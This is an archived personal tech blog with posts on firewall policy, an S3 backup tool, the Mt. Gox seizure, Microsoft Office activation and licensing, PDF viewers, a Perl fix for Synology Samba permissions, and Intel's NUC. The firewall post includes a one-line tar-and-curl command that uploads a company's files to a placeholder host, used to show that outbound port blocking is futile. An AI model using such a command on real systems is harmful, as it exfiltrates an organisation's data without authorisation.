
Paul E. Jones' Blog

Paranoia Leads to Excessive Use of Firewall Rules

June 24, 2013

All of us want to ensure our private information remains private and that data is not leaked onto the Internet. However, some IT departments simply go overboard in trying to secure information.

My wife recently worked for a company that would not allow any external communication by any employee without authorization from management. Without authorization, there were no Internet access privileges at all. That’s certainly one way to control the leaking of information, though the same IT department had absolutely no means to prevent data from being copied to a flash drive. Thus, the policy must have been in place only to prevent leaking of information by “spyware” software unknowingly running behind the scenes. That might have helped, but I doubt it. After all, there were many in the company with Internet access.

Her employer and many, many other IT departments also practice something that makes little sense to me: blocking certain outbound ports. Sometimes an IT department will block outbound UDP ports (all of them, or ranges). Other IT departments will block nearly all outbound TCP ports. To what end? Is the intent to prevent leaking information to the Internet? If so, that is a pointless exercise if the IT department leaves port 443 (HTTPS) open. One could copy a company’s entire collection of data files right out through port 443. Further, software designed to steal information will exploit any available hole. Whether there is a single port open or 65,535 ports open makes no difference. One is all that is needed.
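To make the point concrete, here is a minimal sketch of how trivially data can walk out through an open port 443. The destination is a placeholder for a server the sender controls; nothing beyond stock command-line tools is assumed:

# Pack an entire directory tree and send it out over HTTPS
tar czf - /path/to/company/files | \
    curl -T - https://example.com/upload/files.tgz

From the firewall's perspective, that upload is indistinguishable from any other HTTPS traffic.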

Is the reason for blocking certain outbound ports to prevent employees from using certain software programs? If so, why? Is there truly a business reason to prevent use of certain applications, or is the practice just to demonstrate a certain level of control over employees “because we can”?

Since the usual reasons make little sense to me, I’ve come to the conclusion that the practice of blocking outbound ports on a firewall is really something done out of paranoia. There appears to be a widespread fear of the unknown when it comes to the Internet. An expert in networking and hacking can get anything through a firewall if even one port is open, so blocking a bunch of ports is a futile exercise. What blocking ports does is create more frustration for end users and more work for IT departments as they try to figure out what ports to open for the applications users want to use. What it does not do is provide any real security, which is the claimed objective.

Permalink: Paranoia Leads to Excessive Use of Firewall Rules

Backing Up Files to Amazon S3 Using Pug

May 26, 2013

Like many other people, I have a need to do routine backups of my data. And like many others, I have to concern myself with not just my own files, but everyone’s files on the network. Backing up data can be a mind-numbingly boring chore after a while, only made worse by the fact that I really have better things to do than deal with backups so frequently.

Years ago, I used to back up data to magnetic tape. Yeah, that was a long time ago, but it helps put things into perspective: I’ve had to deal with this problem far too long. Over time, I graduated from magnetic tape to other external storage devices, most recently USB drives.

I tried a variety of techniques for backing up data, from full backups to incremental backups. Incremental backups are nice to perform, since they require far less time. However, if you have ever had to restore from an incremental backup, you know how painful that can be. You have to restore the main backup and then each incremental backup in sequence. And it’s only made worse when what you need to restore is just one user’s files or a single file.

There is also the hassle of dealing with physical backup devices. You cannot simply store those on site, because they are subject to damage by fire, water sprinklers, etc. So periodically, I would take drives to the bank for storage in a safe deposit box. That just added to the pain of doing backups.

What I wanted was a backup solution that met these requirements:

  • I wanted a fully automated solution where I didn't have to be bothered with physical storage devices, storing physical drives in a bank vault, etc.
  • Once put in place, I wanted a solution that "just worked" and was fault tolerant
  • I wanted a solution that was secure
  • I wanted a solution that would work incrementally, storing only new or changed files each day (or even each minute)
  • I wanted a means of storing multiple versions of files, any one of which I could retrieve fairly easily
  • I wanted a solution that would not waste space by storing the same file multiple times (which is a problem when multiple users have the same copy of the same file)
  • I wanted a solution that would preserve locally deleted files for whatever period of time I specify (i.e., if a user deletes a file, I want to be able to recover it)
  • I wanted a solution that would allow me to recover any version of a file for some period of time
  • I wanted a solution that I could rely on even in the face of a natural disaster

Fortunately, cloud storage options came along, which had the potential to meet many of the above requirements. Perhaps the most popular among those options is Amazon S3. Equally important, Amazon S3’s pricing is fairly reasonable. If one has 100GB of data to store, for example, the cost of storage is US$9.50 per month today (that works out to US$0.095 per GB per month). Amazon also has a very good track record of reducing the price of cloud storage as they find ways to reduce their costs, making it even more attractive.

The challenge I had was finding the right software.

I found several packages that would synchronize an entire directory with S3, but that did not meet many of my requirements. For example, if a user accidentally changed a file and then the sync took place, the original file was lost forever. Likewise, I would not want an accidentally deleted file to be removed from cloud storage.

I also found tools that would create full backups and store those in the cloud. However, that approach is extremely costly in terms of storage and bandwidth. I also found some that worked incrementally, wherein one large backup is made and then only changes are uploaded. The problem with that is that restoring files means downloading the main backup file and then every single incremental backup. That’s painful even for a full restore, but horribly painful when trying to restore just a single file.

So not finding a tool that really met my needs, I decided to write my own. The result is a backup program I call Pug. Pug replicates new and changed files to the cloud as they are discovered and deletes files from the cloud when they are deleted from local storage. Importantly, controls are given to the administrator to allow any number of versions of files to be maintained in cloud storage and to maintain deleted files for whatever period of time one wishes. Thus, I can maintain a complete history of all files stored in local storage and retrieve any single one of them.

In practice, I do not keep all versions of all files. While Pug will allow that, I keep at most 14 revisions of files. And if a file is deleted, I will keep the deleted file around for 90 days. These are just my configured policies, but you get the idea. Pug takes care of everything automatically. The intent is to have a flexible solution that will work in many enterprise environments.
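To illustrate the version-retention idea (this is a sketch of the technique, not Pug’s actual code), pruning can be as simple as sorting a file’s stored versions newest-first and deleting everything past the limit. The directory layout and naming scheme here are hypothetical:

#!/bin/sh
# Hypothetical layout: each version of a file is stored as
# <epoch-timestamp>.ver inside a per-file directory
MAX_REVISIONS=14

cd /backup/versions/some-file || exit 1

# List versions newest first; everything past line $MAX_REVISIONS
# is older than the newest 14 and gets removed
ls -1 *.ver | sort -rn | tail -n +$((MAX_REVISIONS + 1)) |
while read -r old_version
do
    rm -f "$old_version"
done

The 90-day retention of deleted files would be a similar sweep, comparing each deletion timestamp against the configured cutoff.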

Pug also meets my other requirements in that it never uploads the same file twice, regardless of whether there are 100 copies on the network. Before uploading to Amazon S3, it compresses files using gzip and then encrypts them using AES Crypt. This provides for bandwidth efficiency and security. (Note: do make sure you keep AES Crypt key files well-protected and stored somewhere other than Amazon S3 in plain view!)
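The general shape of that upload path looks something like the following. To be clear, this is a minimal sketch of the technique rather than Pug’s internals; the bucket name and key file location are placeholders, and it assumes the sha256sum, aescrypt, and s3cmd command-line tools are installed:

#!/bin/sh
# Upload one file, skipping it if its content is already stored
FILE="$1"
BUCKET="s3://example-backup-bucket"
KEYFILE="/secure/backup.key"

# The content hash doubles as the object name, so identical files
# (even from different users) are stored exactly once
HASH=$(sha256sum "$FILE" | cut -d' ' -f1)

if s3cmd info "$BUCKET/objects/$HASH" >/dev/null 2>&1
then
    echo "Already stored: $FILE"
    exit 0
fi

# Compress, then encrypt, then upload
gzip -c "$FILE" > "/tmp/$HASH.gz"
aescrypt -e -k "$KEYFILE" -o "/tmp/$HASH.gz.aes" "/tmp/$HASH.gz"
s3cmd put "/tmp/$HASH.gz.aes" "$BUCKET/objects/$HASH"
rm -f "/tmp/$HASH.gz" "/tmp/$HASH.gz.aes"

A real tool also has to keep a catalog mapping file paths to content hashes and version history; that bookkeeping is where most of the work in a program like Pug lies.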

I have been using Pug for a while and I’m quite pleased with the results. I no longer have to deal with routine backups to physical devices, the system automatically scans all locations (local file system files and files on NAS devices) looking for files to upload or delete, and, of course, the data is securely maintained off-site.

Permalink: Backing Up Files to Amazon S3 Using Pug

US Government Trying to Kill Mt. Gox?

May 16, 2013

Sensationalism at its best, I think. Here's an affidavit filed by the US government in a move to seize all of the US-based assets of Mt. Gox, the largest Bitcoin exchange in the world.

Here are the facts:

  • Mt. Gox is a Japanese company owned by Mark Karpeles (and perhaps others)
  • Mr. Karpeles opened a company in the US that is, as I understand it, a wholly-owned subsidiary of Mt. Gox called Mutum Sigillum LLC
  • Mutum Sigillum, LLC opened a bank account at Wells Fargo, stating it was not a money-transmitting business
  • One can use Dwolla (a US company) to put funds into one's Mt. Gox account, and the money goes from Dwolla to Mutum Sigillum LLC
  • Mutum Sigillum LLC credits your account at Mt. Gox, transferring money between its account in Japan (held at Sumitomo Mitsui Bank) and its account in the US (held at Wells Fargo)

So, the US government decided that Mutum Sigillum LLC is a "money transmitter". But where was the money transmitted? It was transmitted to that person's account at Mt. Gox. This is more-or-less the same notion as wiring money from your bank account in the US to your bank account in Hong Kong, I suppose. Is this a money transmitter? The definition is this:

The term "money transmitting business" means any business other than the United States Postal Service which provides check cashing, currency exchange, or money transmitting or remittance services, or issues or redeems money orders, travelers' checks, and other similar instruments or any other person who engages as a business in the transmission of funds, including any person who engages as a business in an informal money transfer system or any network of people who engage as a business in facilitating the transfer of money domestically or internationally outside of the conventional financial institutions system (Source: 31 USC § 5330(d)(1))

It sounds like the company might be transmitting money, since it is sending money from a customer's account in one place to the customer's account in a different place. The US is trying to argue the company does currency conversion, but Mutum Sigillum LLC does not -- only Mt. Gox, the company based in Japan, does that. So that part of the complaint from the US is nonsense. But they are still "transmitting money", perhaps. The issue I have with this is that they are not transmitting money to other people. They are merely moving it from one account YOU own to another account YOU own. So, transmitted where? To yourself.

So perhaps it still qualifies as a money transmitter. But, then again, who actually transferred the customer's money to Mutum Sigillum LLC? Dwolla did. They have a money transmitter license, I guess. Mutum Sigillum LLC just transferred its OWN money to its OWN account in another country. How was this transmitted? They used Wells Fargo, which is either also a money transmitter or exempt per the end of that definition, since it is a "conventional financial institution". (You have to love how big banks are given a break here.) So, who transmitted the money? The bank did.

So, Dwolla, the bank, and Mutum Sigillum LLC are ALL money transmitters? I can appreciate the first two being classified as such, since they move money from one entity to another entity. Mutum Sigillum LLC does not do that: they transferred funds to themselves: the beneficiary they list on their wire transfers is themselves. Further, Mutum Sigillum LLC used established money transmitters to transfer money: nothing is hidden or secretive in the transaction.

I'm having a tough time seeing how the government is in the right here. It looks to me like they just do not like Bitcoins, feel they are a threat, and are looking for every opportunity to kill them.

What about Dwolla? Are they a money transmitter? In their terms of service, they say, "You also understand that we are not acting as a fiduciary, trustee, money transmitter, or providing any type of escrow service with respect to your funds, but only acting as the receiver’s agent." So, they declare they are not. And they might be able to make that argument, since there is a credit union behind them actually performing the money transfers. (Much like Mutum Sigillum LLC used Wells Fargo.) So, it's OK for Dwolla to not have a license, but Mutum does need one?

And one does have to ask: if the company is not in compliance with the law, rather than taking all of the money -- which includes customer funds! -- why did the government not first notify the company of the compliance requirement? The heavy-handed action makes it damned hard for any startup to build a business. After all, there was certainly no criminal intent here. They just want to allow people to buy and sell Bitcoins.

This leads me back to one argument: the government just does not like Bitcoins.

Permalink: US Government Trying to Kill Mt. Gox?

Microsoft Will Remain the Leader in the Computing Industry

April 2, 2013

Reading my most recent post about Microsoft and their insane product activation procedures, one might surmise that I don’t like Microsoft products very much or loathe the company. Actually, I rather like Microsoft products and held the opinion for years that Microsoft did more to advance the personal computing industry than any other firm out there. While all companies operate for the purpose of making a profit and Microsoft is no exception, the company truly produced some of the best software products on the market.

Consider Microsoft Office as one example. Hands down, it is the best productivity suite on the market. Yes, I’ve tried competitive products. There are some good alternatives out there, but they pale in comparison to Office. Some of the competitive commercial products are really good (e.g., Corel’s office suite), and LibreOffice, which is a free open-source product, is also pretty good. However, they all fall short when it comes to matching the features of Microsoft Office. More importantly, none of them do a perfect job of rendering documents created in Microsoft Office. Perhaps it is not fair to judge a product based on how well it reproduces a Microsoft Office document, but that is really a very important consideration for any potential replacement for Office.

I recall many years ago when I made the move from WordPerfect to Word for Windows. Microsoft did a pretty good job at converting documents, but it was not perfect. Many who were heavily invested in WordPerfect simply could not make the move, but WordPerfect really dropped the ball by being so late to move to the Windows platform. They more-or-less opened the door to Microsoft. At the same time, Lotus and Borland were in a spat over the look and feel of a spreadsheet program and, being so engaged in a pointless debate, did not see Microsoft come in strong with a very good product for Windows, taking the spreadsheet business away from both of them. In the end, Microsoft was king of the productivity suites, and they have not stopped innovating. They continually improve the core productivity tools and have introduced great new products like OneNote.

However, Microsoft did drop the ball in a few areas. These days, I use Google’s Chrome browser because Microsoft failed to keep the innovation engine running with Internet Explorer. Internet Explorer 6 lived way too long, and Microsoft essentially handed the business to Chrome and Firefox. That matters, because many of the more recent innovations in computing have been in the browser area. The browser is helping Google, for example, wrest some control of the productivity space away from Microsoft by offering browser-based productivity tools that, while not perfect, are free, “good enough”, and accessible from the browser.

Microsoft absolutely and completely dropped the ball in the mobile computing area. They dropped the ball so hard that it created a crater several feet deep around the Redmond campus. The first abysmal failure was not making substantial updates to Windows Mobile. Those who developed applications for Windows Mobile know how horrible the Windows CE development environment was. However, it wasn’t just the operating system itself. End users do not care so much about the operating system; rather, they care what they can do with it. Microsoft delivered a fairly crippled platform with Windows Mobile. This gave Apple the opportunity to come into the market and show how to do it right. And they did. The iPhone was an awesome piece of technology at the time.

The second major failing in the mobile computing space was Microsoft’s extremely slow move into the tablet computing market. That was most unfortunate, too, since Microsoft had been a leader in showing off what could be done in the tablet computing space. They just never seemed to get any products into production. Perhaps the issue was that they were so hung up on maintaining full compatibility with legacy Windows desktop software.

Things are different today, though. Microsoft has learned a valuable lesson. Maintaining compatibility with all of the legacy applications is not important to consumers. What is important is providing a platform that consumers like. With the right platform, application developers will develop for that platform. As examples, we have the iPad and Android tablets. Apple and Google have stolen the tablet computing market, and it is refreshing to be able to use such thin, light-weight computing platforms to do the less-serious tasks.

Microsoft did wake up, though, and introduced two new mobile computing platforms: Windows 8 and Windows RT. Microsoft has received a lot of flak over Windows RT, but I actually think it was a good move. In fact, I would argue that Microsoft should not even have a traditional desktop mode on tablet devices. The only reason it is there is to allow legacy applications to run. However, that is only important in the short term. If the desktop mode were not offered on tablets, application developers would develop to the APIs available on Windows RT, and the applications would likely be more natural to the touch interface on tablets.

In its rush to get into the tablet market, Microsoft screwed up the desktop. Windows 8 is a horrible desktop operating system. Yes, there are some improvements in efficiency, but I don’t need the start screen. I don’t want to scroll through a bunch of icons. I don’t want the screen flipping from “desktop mode” to the Start Screen to that screen one uses to find applications. It is really messy. People who buy Windows to run on the desktop want a desktop. People who buy tablets want a tablet. The two environments are different and should stay different. Unless Microsoft fixes this mess with Windows 9, I fear it will drive even more of its users to Mac or Linux. Yes, I said Linux. If you’ve not taken a good look at operating systems like Ubuntu or Linux Mint, you should. Those systems provide a lot of functionality and can run Windows applications through tools like Wine or VirtualBox.

These days, I use a Nexus 7 as my tablet device. It’s really a perfect size for a lot of the more casual things I want to do. There is only one thing I would prefer over a Nexus 7, and that would be a Windows RT device that is about the same size and has an RT version of Microsoft Office built in. If it came with a comparable price tag, the Windows RT tablet would definitely win.

There is a lot of speculation in the market these days about Microsoft’s market strategy, and many paint some very gloomy pictures for the company. I’m actually very upbeat about Microsoft’s future in the computing space. Yes, personal computer sales are down, but they are not dead. Contrary to some calling this the “post PC era”, I would argue the PC is here to stay. I cannot do my job on a tablet, and I know very few who can. Further, I would not want to do my job on a tablet. It’s painful, to say the least. It is simply the wrong tool for the job. However, I can appreciate why many consumers are buying tablets and not buying PCs. One reason is that some do not really use their computer to do real work, anyway: it’s a glorified web browser. Another reason is that consumers already have a PC and are buying tablets to augment those PCs. The latter class of consumers will likely upgrade when there is a compelling reason. Windows 8, unfortunately, is not a compelling reason. Further, Windows 8 is horrible for the enterprises that depend on desktop applications to get real work done.

I do not know what Microsoft has in store, but contrary to what many are suggesting, I think Microsoft should kill the Windows 8 Pro tablet and focus only on Windows RT. That model has proven to work with both iPad and Android tablets. Application developers can build great Windows applications on Windows RT. At the very least, get rid of the desktop mode on the tablet. At the same time, Microsoft needs to do something with Windows 9 so that it is once again a usable desktop operating system for those who use a PC either at home or at work.

I want a tablet to do things I would do on a tablet. I want a desktop operating system to do things I do on a desktop machine. The two do not have to be precisely the same platform, but what I would want is to have Microsoft Office on both. That is the one piece of software that Microsoft holds in its hands that can make it stand out above all competitors. And I don’t think I’m alone here. I suspect that Microsoft could probably “own the market” on both the desktop and tablet, but their current offerings in both are a bit lacking. However, I’m positive they will get this sorted out.

Permalink: Microsoft Will Remain the Leader in the Computing Industry

Microsoft Product Activation Sucks

March 26, 2013

Today, for no sane reason, Microsoft Office on my PC decided that it was not activated, even though it had been installed and activated on my machine for well over a year. It opened a window and told me I had 28 days to activate it. So, what was wrong? I tried to re-enter the activation key, and Office told me that my key was not valid.

This became a very long process. I’m going to detail everything below, but I don’t blame you for wanting to skip the details. It’s pretty dry reading. The bottom line is that Microsoft’s product activation crap screwed up and, through no fault of my own, cost me several hours. I counted at least 4 hours of wasted time. That did not include writing this up, but writing it helps me feel better. :-)

I went through various steps on the troubleshooting page that the product activation window directed me to on Microsoft’s web site. Everything seemed to check out fine, and I finally got to a page that said “Microsoft Customer Service may be able to help” and presented a phone number. I called the number and selected the “business customer” option. I reached a lady who asked if I had a support contract. I’m sure my company does, but I don’t know what it is. She said that it would cost over $500 to provide support to me! My gosh! Seriously!?! I told her the nature of the problem and she went ahead and tried to help me out. She never asked for credit card information, though, so I trust it was a free call. I’m still beside myself that a single support call would cost more than the product itself!

She asked me for the product key, the serial number on my physical disc, etc. She verified everything, said it all appeared valid, and then said she would transfer the call to the product activation team for further assistance. She said that is who I should have called in the first place. Well, I would agree, but I have no idea why Microsoft’s troubleshooting guide for product activation would lead me to customer service.

I was then transferred to some fellow named Raul. He asked for some number that I had never heard of before. I asked what number he was referring to, and he just countered my question with “You are trying to activate Office 2010, right?” I said yes, and he then made the same request for some number. I again told him I had no idea what number he was referring to, so he said he was going to transfer me to customer support. “But I was just there and they transferred me to you!”, I told him. I asked why I should be transferred to customer support when the issue is product activation. He put me on hold for a moment, and the next thing I knew I was transferred to customer support. But this time, they told me that customer support was closed. Nice.

So, I called back. The lady I spoke to in customer service before had given me the direct number (+1 866 432 3012). I spoke to a fellow there and we went through the motions again. Finally, he said he needed to transfer me to customer support. I told him that customer support was already closed, but he insisted and asked me to stay on the line. I did, but then the line dropped. I’m not sure if he dropped the line accidentally or hung up on purpose. After being tossed around like a volleyball, I do have to wonder.

There’s apparently a problem somewhere and I don’t think he can resolve it. He did confirm that my product key was valid, but for whatever reason, Office 2010 is telling me otherwise.

It was late at night. I went to bed.

The next day, I called Microsoft’s activation number. Again, they asked me twice to read the product activation key, and they told me that it validates. Now, just in case you are not aware, those product activation keys are very long alphanumeric sequences. To say that I’m tired of repeating this number is an understatement. After verifying that it validated, I was transferred to customer support. I was also given a direct number to customer support (+1 800 936 5700), and a support case was opened (case # 1201074501). The wait time was 33 minutes, but fortunately there was an option to have Microsoft call me back.

In the meantime, I was curious as to whether communication was really happening between my PC and Microsoft’s activation servers. Oddly, I could not see any. I used Wireshark to watch traffic between my PC and Microsoft. I saw IP packets going to several places that I could identify, but none going to Microsoft. So, was Office even communicating with Microsoft’s servers? I disabled the network interfaces on my laptop and got the same results. Office wasn’t even talking to Microsoft!
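For anyone wanting to repeat that kind of check, a capture along these lines (a sketch; the interface name is machine-specific) lists the remote addresses your machine is talking to while the activation dialog is up:

# Capture 500 packets and list the unique destination addresses
tshark -i eth0 -c 500 -T fields -e ip.dst | sort -u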

I got a call back from Microsoft. The support person said they needed to reinstall Office 2010. Why!?!? How did it break? I didn’t break it. Nothing new had been installed, except for the updates that come down from Microsoft. So, did Microsoft break Office in some Windows update? In any case, it had to wait, because I had a meeting to attend.

The Microsoft representative called me back after the meeting, uninstalled Office, and re-installed it. Interestingly, he said he had to use a new activation key. He blamed the activation server for something, but it was not clear to me what the issue was. All I know is that he used a new key, yet he used the old installation binary. So, I’m wondering why the re-install was even needed. If he had to change keys for some external reason, then I don’t understand the need to re-install the software.

He also applied a number of Windows registry changes, changed the user account control settings to be insanely permissive, changed permissions on the temp directory, and modified my preferred folder view settings. I asked him to change the folder permissions back, but I still had to change the other things myself and double-check settings. I then had to re-download a bunch of patches via Windows Update.

Next up, a bunch of applications got screwed up somehow. From what I can tell, some important files in the c:\windows\installer directory were deleted in the process. Damn! How many hours of my day am I obliged to waste because of this crap? I’ve wasted several already and it looks like I’m going to have to re-install a bunch of applications.

Permalink: Microsoft Product Activation Sucks

PDF Creation, Editing, and Viewing

March 18, 2013

It seems that with each passing year, the value of PDF increases. It is the common document format that allows one to view a document perfectly on a wide variety of computing platforms, from PCs and Macs to tablets and mobile phones. In recent years, though, Adobe Reader has been plagued with issues. Actually, I’ve been fortunate enough to never encounter those issues myself, but Adobe sends out updates from time to time to patch some security vulnerability. So, there are definitely issues.

Adobe’s most recent update to their Windows version of Reader did present me with a problem, though: I could not open two PDF documents at the same time. It did not matter what I did, it was impossible to open a second document.

So, I went looking for an alternative PDF viewer for my PC. I decided to give Foxit a try. I had heard about Foxit a few years ago, but did not really know how well it compared to Adobe. I was impressed right away. It seemed to load quickly, render quickly, scroll quickly, and I could not find a document that presented rendering issues. (Yeah, that is the one ugly truth about PDF. It’s universally available, but largely because Adobe Reader is universally available. In my experience, other software does not always consistently render PDF documents properly.)

I’ve been using Foxit every day now for a few weeks. It’s a really great PDF viewer. So far, I have not found a single instance where it failed to properly render a PDF document.

Permalink: PDF Creation, Editing, and Viewing

Microsoft Office 2013: Licensing from Hell

March 4, 2013

I upgrade to the latest version of Microsoft Office every time a new version is released. While some feel that Office has more features than anyone needs, I spend much of my time working in Office and have always appreciated the new enhancements and features that came with each new Office release.

Unfortunately, Office 2013 brings with it such insane licensing agreements that I cannot buy it. I do not have any reasonable options. There are basically four options I could consider, but each one presents a roadblock.

Option 1 – Office 2013 Professional

This is more-or-less the same product I have purchased from Microsoft with every product update. In the past, I could install it on my primary desktop and on my laptop. I could use it for work-related activities or personal stuff. If I bought a new machine, I could uninstall it from my old machine and install it on my new machine. The Office 2013 Professional license agreement forbids that. It says that the software is licensed for a single computer and that “you may not transfer the software to another computer or user.” You are not allowed to install a second copy on a laptop, either. Honestly, I don’t care about the desktop and laptop installs. However, I do buy new computers from time to time, and if I buy a new one, I don’t want to be in a situation where I cannot install Office. And that’s exactly what it says: I cannot do that. Just imagine spending $400 on new software tomorrow, and the next day your computer breaks. You’re out of luck. You lose your computer and your $400 for Office.

Option 2 – Office 365 Home Premium

This is Microsoft’s new subscription service. You basically get everything in the $400 Office Professional version, except it’s a subscription service. With the service, you get updates at no charge as long as you maintain the subscription. The cost is $100/year, which is a reasonable price as compared to the Office Professional 2013. Further, you have the right to install and use Office on up to 5 different computers. You can even use it on Mac or Windows. Boy, for those looking for an opportunity to escape Windows for a Mac, this is the ticket.

Unfortunately, this option has a major problem: it’s licensed for home use only. You are not allowed, per the license agreement, to use it for business. It is rather explicit about saying it is for “Home” and “Non-Commercial Use”. So, what if I author a document for work using it? Apparently, that’s not acceptable. My wife owns a business where she needs to use Office about 10% of the time, whereas the other 90% is personal. Well, that’s not permitted, either. Both of those activities would be classified as commercial use. So, Option #2 is out.

Option 3 – Office 365 Small Business Premium

This option allows one to buy Office for use in business. Oh, but this one is explicitly listed as a product for business use only. I assume that is the case, because the page says “for business use” under the “Which Office products are available for home and business?” drop-down. Further, if you try to sign up, it wants your business name and email. But I don’t want something exclusively for business. This is software I sometimes use at home and sometimes use for work. So, this one is out.

Option 4 – Office Home & Business 2013

This one is like Office 2013 Professional, except it is missing Publisher. I want Publisher! So, I buy this and don’t get Publisher? I guess so, but it has a lower price, too. I guess I could buy Publisher separately. The problem is that, like Office 2013 Professional, it is tied to a single computer. You spend the $220 they are asking for the product, but run the risk that if the computer dies, your $220 goes out the window. No thanks.

Conclusion

Microsoft has successfully created a licensing scheme so messed up that I have no upgrade path. Congratulations, Microsoft. I’ll keep using Office 2010, as I have no viable, legal alternative. In the meantime, I’ll have to invest a little time evaluating alternatives. There are Kingsoft, WordPerfect, and LibreOffice. Others?

UPDATE: It appears that Microsoft heard this complaint from too many customers, as they have taken a sane step with licensing. It is now permissible to transfer purchased copies of Office from one machine to another, if you wish.

Permalink: Microsoft Office 2013: Licensing from Hell

Resetting Directory and File Masks on Synology NAS

December 9, 2012

If you have a Synology NAS and you mount its file systems on Linux, you see something horrible. Synology always sets the directory and file creation masks to 0777, so all files and directories are readable and writable by everybody on the Linux machine. It works fine on Windows, since access to files is controlled by the Samba software.

If you're like me, though, you want a little more control. This Perl script, when run on a Synology NAS server running DSM 4.1, will add the desired config lines to the smb.conf file. Put it over in /usr/local/bin/modify_samba_config (and make sure root can execute this program).

NOTE: DSM 5 and DSM 6 change a few things. See the notes at the bottom.

Source Code

#!/usr/bin/perl
#
# Modify the smb.conf file on the Synology disk station
#

# Location of the smb.conf and temp files
$smb_file = "/usr/syno/etc/smb.conf";
$tmp_file = "/tmp/mod_smb_cfg.$$";

# Below are the names of the shares and to the right
# are the config lines to introduce
%share_config =
(
    'archive'            => [
                                  "directory mask = 0755",
                                  "create mask = 0644"
                            ],
    'music'              => [
                                  "directory mask = 0755",
                                  "create mask = 0644"
                            ],
    'pictures'           => [
                                  "directory mask = 0755",
                                  "create mask = 0644"
                            ],
    'public'             => [
                                  "directory mask = 0775",
                                  "create mask = 0664"
                            ]
);

#
# SameOption
#
# This function will check to see if the option names are the same
#
sub SameOption
{
    my (@options) = @_;

    my ($i);

    if ($#options != 1)
    {
        return 0;
    }

    # Normalize values
    for ($i=0; $i<=1; $i++)
    {
        $options[$i] =~ s/=.*//;          # Remove "=" and everything after it
        $options[$i] =~ s/^\s+//;         # Remove all leading whitespace
        $options[$i] =~ s/\s+$//;         # Remove all trailing whitespace
        1 while $options[$i] =~ s/  / /g; # Remove excess spaces
    }

    if (($options[0] eq $options[1]) && (length($options[0]) > 0))
    {
        return 1;
    }
    else
    {
        return 0;
    }
}

#
# MAIN
#
# The following is the main logic of the program
#

# Read the old config, make changes, writing to a temp file
open(SMBFILE, "< $smb_file") || exit;
open(TMPFILE, "> $tmp_file") || exit;

while(<SMBFILE>)
{
    # We will assume the current line will be printed
    $print_line = 1;

    # This logic will remove lines from the existing config that are
    # added via the $share_config array
    if ((!/^\[/) && (length($section_name) > 0))
    {
        $tline = $_;
        chomp($tline);

        foreach $line ( @{ $share_config{"$section_name"} } )
        {
            # Is the current config option one of the lines we manage?
            if (SameOption($tline, $line))
            {
                $print_line = 0;
                last;
            }
        }
    }
    if ($print_line)
    {
        print TMPFILE;
    }
    next unless /^\[/;

    # Add configuration lines as specified in "share_config"
    chomp($section_name = $_);
    $section_name =~ s/^\[//;
    $section_name =~ s/\].*//;
    foreach $line ( @{ $share_config{"$section_name"} } )
    {
        print TMPFILE "\t$line\n";
    }
}

close(SMBFILE);
close(TMPFILE);

# Read the temp file in and replace the original config file
open(TMPFILE, "< $tmp_file") || exit;
open(SMBFILE, "> $smb_file") || exit;

while(<TMPFILE>)
{
    print SMBFILE;
}

close(TMPFILE);
close(SMBFILE);

# Get rid of the temp file
unlink($tmp_file);

You can modify the config lines, adding or removing whatever you wish. The "keys" in that hash (e.g., "archive" and "public") are the names of the Samba shares created on your Synology box. You'll need to assign those appropriately. You can have different additions per "share" to customize whatever you wish. (Note that if Synology already has a config line like the one you introduce, your config line might be ignored. I've not tested what happens if there are two conflicting config lines.)
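For example, with the hash shown above, the [archive] section of the rewritten smb.conf would begin like this (the rest of the section is whatever DSM generated):

[archive]
    directory mask = 0755
    create mask = 0644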

Now, you want this script to run before Samba starts. I tried adding it to rc.local, but the Synology box loads services like Samba in the background, so there is a risk of a race condition and things not working right.

What I decided to do was create a "service" that the Synology box calls before it starts Samba, but after it has re-built the config (which it does every time the machine boots). I created a script in /usr/syno/etc/rc.d/S80alt_samba_config.sh. The Samba service is S80samba.sh, so this script will get called first (alphabetical sorting).

Source Code

#!/bin/sh

if [ $# -eq 0 ]; then
        action=status
else
        action=$1
fi

# dispatch actions
case $action in
        start)
                /usr/local/bin/modify_samba_config
                ;;
        *)
                # Do nothing with any other command
                ;;
esac

That's it! Now, if you reboot the NAS server, you should get the Samba permissions you wanted.

DISCLAIMER: This is not a technique you should try if you're not familiar with Linux system administration. I cannot help you if you break your NAS server. Carefully review the code and test it before using it.

UPDATE: It appears that each time you install an update of the DSM software, the /usr/syno/etc/rc.d directory gets replaced. So, you'll have to put the "S80alt_samba_config.sh" script back in place each time. The /usr/local/bin/ directory appears to remain untouched.

UPDATE: With DSM 5, I think it was, the name of the rc.d script had to change to S02smbfix.sh in order to run at the proper time.

UPDATE: With DSM 6, Synology moved things around. The smb.conf file is now in /etc/samba/. So, the line that says '$smb_file = "/usr/syno/etc/smb.conf";' needs to change to '$smb_file = "/etc/samba/smb.conf";'. Also, the rc.d directory changed. It appears that placing the script "S02smbfix.sh" into /usr/local/etc/rc.d will work.
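If you would rather have one copy of the Perl script work across DSM versions, a small guard at the top can pick the right path based on which file exists (a sketch based on the locations noted above):

# Pick the smb.conf location based on which file exists
if (-f "/etc/samba/smb.conf")
{
    $smb_file = "/etc/samba/smb.conf";      # DSM 6
}
else
{
    $smb_file = "/usr/syno/etc/smb.conf";   # DSM 4 and DSM 5
}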

Permalink: Resetting Directory and File Masks on Synology NAS

Intel's Next Unit of Computing

December 2, 2012

Intel released a really cool new device called the Next Unit of Computing. It's a small 4x4x2" box that packs the power of an Intel Core i3 processor. It has three USB ports, two HDMI ports, and a gigabit Ethernet port, and it consumes very little power compared to a normal desktop machine.

It's designed to be mounted right on the back of a display using the supplied VESA mounting bracket, turning any display device into a computer.

It was not made for the technically challenged, though. At the same time, one does not have to be a hardware expert, either. It is sold as a kit, and one has to buy the memory and storage separately. While that was expected, what was not expected was the fact that the kit ships without a power cord to go from the power brick to the wall. I had to make a run to the local CompUSA to get one of those.

It uses an mSATA drive for storage and can hold up to 16GB of DDR3 RAM.

I purchased a 128GB mSATA drive and 4GB of RAM for mine. Total cost was about $440 for the NUC, storage, RAM, and power cord.

I've only had it running a few hours, but this thing is awesome. I installed Linux on it and replaced one of my aging Linux machines. I use Linux machines in my house to provide various network services, including DHCP, TFTP, and DNS, and use the devices when writing software on Linux, including AES Crypt. These devices also handle storage functions for me, allowing me to back up data to Amazon S3.

I don't have a monitor or keyboard connected to the box. It's just a tiny little box connected to the network that I access via SSH that serves a useful purpose for me and my family.

Another great feature of this device is that it consumes far less power than the desktop it replaced. That desktop was not a monster machine, just a low-end Dell Dimension, yet I could tell from the display on my UPS that the NUC draws noticeably less.

